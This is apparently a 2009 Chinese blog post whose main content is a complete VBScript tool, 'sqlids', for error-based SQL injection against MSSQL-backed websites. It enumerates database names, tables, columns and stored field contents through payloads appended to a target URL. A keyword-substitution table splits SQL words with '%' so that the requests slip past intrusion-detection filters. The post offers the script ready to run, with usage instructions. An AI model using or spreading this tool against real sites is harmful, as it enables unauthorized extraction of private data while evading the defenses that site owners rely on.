作者:lcx

set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Wscript.Quit
End If
if arg.count=0 then
usage()
Wscript.Quit
End If

Sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型"
wsh.echo "sqlids v0.02 by lcx"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||———–>得到全部库名"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||——–>得到全部表名"
wsh.echo "cscript "&wscript.scriptname&" url filed 表名||———->得到全部字段"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 表名||———->得到字段内容"
wsh.echo string(79,"*")&vbcrlf
end Sub
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function GetBody(url)' xml得到网页源码,可以改成cookie或get提交
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "post", url, False, "", ""
.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
.setRequestHeader "Accept-Encoding", "gzip, deflate"
.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.1.4322)"
.setRequestHeader "Connection", "Keep-Alive"
.setRequestHeader "Cache-Control", "no-cache"
.Send
GetBody = .ResponseBody
.abort
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
Function ReplaceKeyWord(Value)'绕过ids过虑
Table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown->shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|[k]|fetch->fe%tch|[k]|next->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|exec->e%xec|[k]|=!->=%!|[k]|—>-%-|[k]|xp_->x%p_|[k]|sp_->s%p_|[k]|and->a%nd"
Dim i, Relpacement, Temp
Relpacement = Split(Table, "|[k]|")
ReplaceKeyWord = Value
For i = 0 to UBound(Relpacement)
Temp = Split(Relpacement(i), "->")
If UBound(Temp) = 1 Then ReplaceKeyWord = Replace(ReplaceKeyWord, Temp(0), Temp(1))
Next
End Function
Function result(sHTMLTEMP) '用nvarchar做关键字分隔网页内容,用正则帅一点,可惜不太会
aHTML = Split(sHTMLTEMP, "nvarchar")
If(UBound(aHTML) > 0)Then
sHTMLTEMP = aHTML(1)
aHTML = Split(sHTMLTEMP, "'")
sHTMLTEMP = aHTML(1)
End If
result=sHTMLTEMP
End Function

Function Str2Hex(strHex)'sql的16进制转换函数
Dim sHex
For i = 1 To Len(strHex)
sHex = sHex & Hex(Asc(Mid(strHex,i,1)))&"00"
Next
Str2Hex = "0x"&sHex
End Function

'————————————–以下代码是注入语句,完全不需要引号
url=arg(0)
set arg=wscript.arguments
if arg.count=0 then wscript.quit
injection =arg(1)

select case injection
case "dbname"
wscript.echo result(Replace(getHTTPPage(url&" "&ReplaceKeyWord("and db_name(0)>0–")),Chr(34),""))&"(当前库)"
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("and db_name("&i&")>0–")),Chr(34),"")
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0

case "table"
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects where xtype=0x7500))–")),Chr(34),"")
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0

case "filed"
colname=Str2Hex(arg(2))
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("and 0<>COL_NAME(OBJECT_ID("&colname&"),"&i&")–")),Chr(34),"")
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
case "result"
i=1
Do
Body = Replace(getHTTPPage(url&" "&ReplaceKeyWord("a%nd 0<>(se%lect top 1 "&arg(2)&" from "&arg(3)&" where "&arg(2)&" not in (select top "&i&" "&arg(2)&" from "&arg(3)&"))–")),Chr(34),"")
k=InstrRev(body,"nvarchar", -1, 0)
i=i+1
If k<>0 Then
wscript.echo result(body)
Else
wsh.echo "========over============"
End if
Loop Until k=0
Case else
wscript.echo "注意参数"
usage()
end select



分享到: 更多

这篇日志的 QR 二维码为:

九月 23rd, 2009

Posted In: 未分类

发表评论

电子邮件地址不会被公开。 必填项已用*标注

无觅相关文章插件,快速提升流量